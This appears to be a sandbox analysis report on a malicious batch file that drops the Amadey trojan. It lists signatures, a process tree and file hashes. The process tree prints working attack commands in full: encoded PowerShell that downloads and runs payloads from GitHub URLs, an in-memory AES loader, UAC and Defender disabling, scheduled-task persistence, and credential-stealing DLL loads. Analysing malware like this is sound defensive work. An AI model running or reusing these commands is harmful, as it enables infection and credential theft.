Overview

overview

10

Static

static

1

SKMBT18276392733.bat

windows7-x64

8

SKMBT18276392733.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    114s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-05-2023 19:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SKMBT18276392733.bat

  • Size

    22KB

  • MD5

    244584512d6decb0d37cef150886e636

  • SHA1

    fe50c7e039605957ab9bfd034f7861e6023d0093

  • SHA256

    56107979d024223bd4ba443cf654ebfc32e19a3eaffd7a055fadb6ac1ce97866

  • SHA512

    24613bbe96ab7befac49f8d4acd6b8a9d14bb0add1651412c0859d4031feabd2aa40e8e582a449af7acbb0eba6776de1b65f0ead759c7fcf089bf3d12eb46243

  • SSDEEP

    384:b2VPeJS3xtpEG3cZrUKUE0gMGfa9720wvjeqzAzW6yeVf9jlP7JYK5zf8rh:bUWJS3xwQ8rUwMaaJ20wvjj0zLVRlzO5

Score
10/10
amadeyevasionpersistencespywarestealertrojan

Malware Config

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat' -ArgumentList 'am_admin'"
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4120
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -nologo -noprofile -WindowStyle hidden -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE4ARQBUAEYAcgBhAG0AZQBXAG8AcgBrAHYANAAvAHYANAAuADgALwByAGEAdwAvAG0AYQBpAG4ALwBOAEUAVABGAHIAYQBtAGUAdwBvAHIAawA0ADgALgB6AGkAcAAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrADQAOAAuAHoAaQBwACIAIAA7ACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE4ARQBUAEYAcgBhAG0AZQB3AG8AcgBrADQAOAAuAHoAaQBwACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAiAAoA
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2308
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo F"
          4⤵
            PID:5112
          • C:\Windows\system32\xcopy.exe
            xcopy "C:\Users\Admin\AppData\Roaming\NETFramework48\install.exe" SKMBT18276392733.bat.exe /y
            4⤵
              PID:3400
            • C:\Windows\system32\attrib.exe
              attrib +s +h SKMBT18276392733.bat.exe
              4⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:2752
            • C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat.exe
              SKMBT18276392733.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $fYKlAa = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat').Split([Environment]::NewLine);$zAMRif = $fYKlAa[$fYKlAa.Length - 1];$fHGQOa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgbmdsZFdvIHsgcHVibGljIHN0YXRpYyBieXRlW10gR1JTUFZaKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gQkVsc25kKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $fHGQOa;[System.Reflection.Assembly]::Load([ngldWo]::BElsnd([ngldWo]::GRSPVZ([System.Convert]::FromBase64String($zAMRif), [System.Convert]::FromBase64String('kptjpDtZ2mynxw/vEx8Zgdd06zp+Ilq9lbxPnRLrRJs='), [System.Convert]::FromBase64String('wiqGzf0zTff4tyYiSAHyvw==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1200
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l2lnmy52\l2lnmy52.cmdline"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES864C.tmp" "c:\Users\Admin\AppData\Local\Temp\l2lnmy52\CSCFF6E6DAA1D124F2B8D6E2BB1FF682FF.TMP"
                  6⤵
                    PID:4788
                • C:\Users\Admin\AppData\Roaming\NETFramework48\install.exe
                  "C:\Users\Admin\AppData\Roaming\NETFramework48\install.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0; Add-MpPreference -ExclusionPath C:\ -ExclusionExtension 'exe','zip' ; @('https://github.com/Fuero233/petL/raw/main/csrsv32.zip') | foreach{$fileName = $env:APPDATA + '/csrsv32.zip' ;(New-Object System.Net.WebClient).DownloadFile($_,$fileName);Expand-Archive -LiteralPath $fileName -DestinationPath $env:APPDATA;Invoke-Item $env:APPDATA\csrsv32\csrsv.exe }
                  5⤵
                  • UAC bypass
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  • System policy modification
                  PID:1844
                  • C:\Users\Admin\AppData\Roaming\csrsv32\csrsv.exe
                    "C:\Users\Admin\AppData\Roaming\csrsv32\csrsv.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of WriteProcessMemory
                    PID:2696
                    • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                      "C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3344
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
                        8⤵
                        • Creates scheduled task(s)
                        PID:2272
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "Admin:N"&&CACLS "..\6fd2e6071d" /P "Admin:R" /E&&Exit
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4380
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          9⤵
                            PID:4308
                          • C:\Windows\SysWOW64\cacls.exe
                            CACLS "oneetx.exe" /P "Admin:N"
                            9⤵
                              PID:2384
                            • C:\Windows\SysWOW64\cacls.exe
                              CACLS "oneetx.exe" /P "Admin:R" /E
                              9⤵
                                PID:4652
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                9⤵
                                  PID:1436
                                • C:\Windows\SysWOW64\cacls.exe
                                  CACLS "..\6fd2e6071d" /P "Admin:N"
                                  9⤵
                                    PID:2988
                                  • C:\Windows\SysWOW64\cacls.exe
                                    CACLS "..\6fd2e6071d" /P "Admin:R" /E
                                    9⤵
                                      PID:560
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\27d75989acd3e0\cred64.dll, Main
                                    8⤵
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:1412
                                    • C:\Windows\system32\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\27d75989acd3e0\cred64.dll, Main
                                      9⤵
                                      • Loads dropped DLL
                                      PID:652
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 652 -s 648
                                        10⤵
                                        • Program crash
                                        PID:4860
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\27d75989acd3e0\clip64.dll, Main
                                    8⤵
                                    • Loads dropped DLL
                                    PID:3488
                          • C:\Windows\system32\attrib.exe
                            attrib -s -h SKMBT18276392733.bat.exe
                            4⤵
                            • Views/modifies file attributes
                            PID:4456
                    • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                      C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2376
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -pss -s 444 -p 652 -ip 652
                      1⤵
                        PID:3824
                      • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                        C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1552

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                        Filesize

                        2KB

                        MD5

                        6cf293cb4d80be23433eecf74ddb5503

                        SHA1

                        24fe4752df102c2ef492954d6b046cb5512ad408

                        SHA256

                        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                        SHA512

                        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        64B

                        MD5

                        5caad758326454b5788ec35315c4c304

                        SHA1

                        3aef8dba8042662a7fcf97e51047dc636b4d4724

                        SHA256

                        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                        SHA512

                        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        f8af51419ad5fdc91beb035ca324b166

                        SHA1

                        edf1ad7ce91950d2991186db4220996cdce3399e

                        SHA256

                        75701ffb7bef939fc6f5489745998684c2005539c8ed8e88a6d35ebbda415767

                        SHA512

                        67b156c0322513fd7169fd78704fd3e87c5f18e7262977644382f577d7d77cee890b91de18b28cbc34cff36569b95f7946236c7676e76be5387d9d2affd24210

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        88e476ece9bc4c885b3b592769ae9387

                        SHA1

                        b401c4f5354fc7688f2881b6ca60c0ec84a74eae

                        SHA256

                        f91710b53500380d0d2d14c11a82ae0d899b1828d339fc339fb840494b38dcea

                        SHA512

                        ab7d44624467f60005229a01c36322cc81c2a51f59c2fbb1b708e216bd46d726dfda82cd35a47e421d3ed9742645c2dbf3862972005643a0339fefda5a0a003d

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\548970870369
                        Filesize

                        76KB

                        MD5

                        c57ff86ccfb6436c7b02fa9a7a51845e

                        SHA1

                        d60950a6f8429a9c2d0180fede7d3cfca85428b5

                        SHA256

                        2b02f759405221ec763a8f338a943df1b73c812a0c79054f001f36c8874ee376

                        SHA512

                        a394b798fb05499778f7dfd99d8adc45c0060f3b68ea6be624a131c40e4c5335a483ac7dca2d25cb5549ff4b77ad72d78edebf7b465359540723dd458a84eec8

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\6fd2e6071d\oneetx.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\RES864C.tmp
                        Filesize

                        1KB

                        MD5

                        2a05a5c39e6e85ca218e7cc2e7e4f10c

                        SHA1

                        085caaeee4919ef6fc20b700094845a7f963308a

                        SHA256

                        5cd92c968ea66bd11e5b769441ed0426b53e94c9664fd5eb63e2ce2334d3676c

                        SHA512

                        2e10c5304c05cc3dc9f33a1dbcba5223021bc5b70e33e3891f6bfb33ab5cf9284c100d81df47c9dc43ebb40faa6904fd4353d975744142d69e73a85a126ace12

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat.exe
                        Filesize

                        437KB

                        MD5

                        7353f60b1739074eb17c5f4dddefe239

                        SHA1

                        6cbce4a295c163791b60fc23d285e6d84f28ee4c

                        SHA256

                        de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c

                        SHA512

                        bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat.exe
                        Filesize

                        437KB

                        MD5

                        7353f60b1739074eb17c5f4dddefe239

                        SHA1

                        6cbce4a295c163791b60fc23d285e6d84f28ee4c

                        SHA256

                        de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c

                        SHA512

                        bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\SKMBT18276392733.bat.exe
                        Filesize

                        437KB

                        MD5

                        7353f60b1739074eb17c5f4dddefe239

                        SHA1

                        6cbce4a295c163791b60fc23d285e6d84f28ee4c

                        SHA256

                        de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c

                        SHA512

                        bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wfg5h4x.jtb.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\l2lnmy52\l2lnmy52.dll
                        Filesize

                        3KB

                        MD5

                        e6b8a97d119d9f510cf9eda65acc1b07

                        SHA1

                        922cd720404960a9401aa69cc5f05f549a8f33df

                        SHA256

                        1a2000640068cab7cf05383b791b19426a91e82b3b7d83fabcef6d008eb90a17

                        SHA512

                        762430ed56e9481bd6de5be297b0678c1ba8318f4c6b9b4db2de420e4be4db8b4249a26703f389143e94dd256d91d9b30e5856642f2ee3b77c664e08ff6ca582

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\clip64.dll
                        Filesize

                        89KB

                        MD5

                        fb32ce419c5bea931a9e3c4ad70dec00

                        SHA1

                        e1ca25f572063dba1d25e58929ddce168338998f

                        SHA256

                        6e77875e1ef76b39cfc68d919b4919da77d320bf208d826b643bd7ba48a5b38c

                        SHA512

                        87bee77b1b13c35a37e02bb26019956db12a77f6ceab3694f03dce5bd9d105de5711f6fb2371d0d4ae888932fd50e639634b217084316c5ea159e8aef7cae703

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\clip64.dll
                        Filesize

                        89KB

                        MD5

                        fb32ce419c5bea931a9e3c4ad70dec00

                        SHA1

                        e1ca25f572063dba1d25e58929ddce168338998f

                        SHA256

                        6e77875e1ef76b39cfc68d919b4919da77d320bf208d826b643bd7ba48a5b38c

                        SHA512

                        87bee77b1b13c35a37e02bb26019956db12a77f6ceab3694f03dce5bd9d105de5711f6fb2371d0d4ae888932fd50e639634b217084316c5ea159e8aef7cae703

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\clip64.dll
                        Filesize

                        89KB

                        MD5

                        fb32ce419c5bea931a9e3c4ad70dec00

                        SHA1

                        e1ca25f572063dba1d25e58929ddce168338998f

                        SHA256

                        6e77875e1ef76b39cfc68d919b4919da77d320bf208d826b643bd7ba48a5b38c

                        SHA512

                        87bee77b1b13c35a37e02bb26019956db12a77f6ceab3694f03dce5bd9d105de5711f6fb2371d0d4ae888932fd50e639634b217084316c5ea159e8aef7cae703

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\cred64.dll
                        Filesize

                        1.0MB

                        MD5

                        a995fde990914d0ae4278af25213cac0

                        SHA1

                        e610383a2c2ebd1de209539c1f6ec7e35436329f

                        SHA256

                        af4ddfd4d441c924a034ef6bf800b07ac0bcfdf42616ef64178f2487c1d917e8

                        SHA512

                        1362df3adeeac45c1e3aa52fd19eedb5340252d9879fa7a4c40da27e1f27bc1ba5c56a1883a8e81090a1d28d4f80c1ac3fdb7a1d144fb2b9c54e39ba48dd6924

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\cred64.dll
                        Filesize

                        1.0MB

                        MD5

                        a995fde990914d0ae4278af25213cac0

                        SHA1

                        e610383a2c2ebd1de209539c1f6ec7e35436329f

                        SHA256

                        af4ddfd4d441c924a034ef6bf800b07ac0bcfdf42616ef64178f2487c1d917e8

                        SHA512

                        1362df3adeeac45c1e3aa52fd19eedb5340252d9879fa7a4c40da27e1f27bc1ba5c56a1883a8e81090a1d28d4f80c1ac3fdb7a1d144fb2b9c54e39ba48dd6924

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\cred64.dll
                        Filesize

                        1.0MB

                        MD5

                        a995fde990914d0ae4278af25213cac0

                        SHA1

                        e610383a2c2ebd1de209539c1f6ec7e35436329f

                        SHA256

                        af4ddfd4d441c924a034ef6bf800b07ac0bcfdf42616ef64178f2487c1d917e8

                        SHA512

                        1362df3adeeac45c1e3aa52fd19eedb5340252d9879fa7a4c40da27e1f27bc1ba5c56a1883a8e81090a1d28d4f80c1ac3fdb7a1d144fb2b9c54e39ba48dd6924

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\27d75989acd3e0\cred64.dll
                        Filesize

                        1.0MB

                        MD5

                        a995fde990914d0ae4278af25213cac0

                        SHA1

                        e610383a2c2ebd1de209539c1f6ec7e35436329f

                        SHA256

                        af4ddfd4d441c924a034ef6bf800b07ac0bcfdf42616ef64178f2487c1d917e8

                        SHA512

                        1362df3adeeac45c1e3aa52fd19eedb5340252d9879fa7a4c40da27e1f27bc1ba5c56a1883a8e81090a1d28d4f80c1ac3fdb7a1d144fb2b9c54e39ba48dd6924

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\NETFramework48\install.exe
                        Filesize

                        437KB

                        MD5

                        7353f60b1739074eb17c5f4dddefe239

                        SHA1

                        6cbce4a295c163791b60fc23d285e6d84f28ee4c

                        SHA256

                        de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c

                        SHA512

                        bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\NETFramework48\install.exe
                        Filesize

                        437KB

                        MD5

                        7353f60b1739074eb17c5f4dddefe239

                        SHA1

                        6cbce4a295c163791b60fc23d285e6d84f28ee4c

                        SHA256

                        de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c

                        SHA512

                        bd98c8aee1138d17c39f2fb0e09bf79ef2d6096464ceb459cc66c5fb670df093414a373bbb4b4d8e7063c2eacb120449c45df218033f2258f56bec1618b43c4c

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\csrsv32\csrsv.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\csrsv32\csrsv.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • C:\Users\Admin\AppData\Roaming\csrsv32\csrsv.exe
                        Filesize

                        211KB

                        MD5

                        13c6b003e4cd8319299a50a51e14a222

                        SHA1

                        00f9e5a0204defd1a569bfbdf0c690b351349dde

                        SHA256

                        28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681

                        SHA512

                        ff5ae3c0cb40d17bd4aca3ad994ce251001aebcf3ba8a8a83ee7b4cc11f35ccd20523dc00888f150c89147a852a125b29a982dc06c1b6a152efd6b3cac12cb52

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\l2lnmy52\CSCFF6E6DAA1D124F2B8D6E2BB1FF682FF.TMP
                        Filesize

                        652B

                        MD5

                        aa898e8c230d0ff8423a556ac7c81b58

                        SHA1

                        c2ce819406f40bcaccbd20eff1131230183fe111

                        SHA256

                        e2f3271d2ed2d9e6cfe5921f92be14a1050ed75cd52b6ae7feb925248bd8a261

                        SHA512

                        c586162a15d4393a667eed9dcaaaef25bda22a1a8c76e02e24f55b8ca7d931fe634555ec09ef13fd71068609d5958914e2bd264f59e65b8dfe2f194356f713a5

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\l2lnmy52\l2lnmy52.0.cs
                        Filesize

                        744B

                        MD5

                        c5645e433af20731fa47a52aae67dd2c

                        SHA1

                        a9b91caf58fae108a8ae64b09adf54a572cb29a8

                        SHA256

                        763751e2684228df2e2c71608a0ac978196bab57bf57fffbc9b4bf300711493d

                        SHA512

                        5c5c3e5b88d33236415a7d531f2244d6c65b07a7ceaffe7e8e92741d5c0fe541cb82db67300aa0aa46ac7ffb6c592e311e3de0bf6af3fc1e6d5b2d6a44353b5a

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\l2lnmy52\l2lnmy52.cmdline
                        Filesize

                        369B

                        MD5

                        e80e1c116955890a2e0077b8f3a3375d

                        SHA1

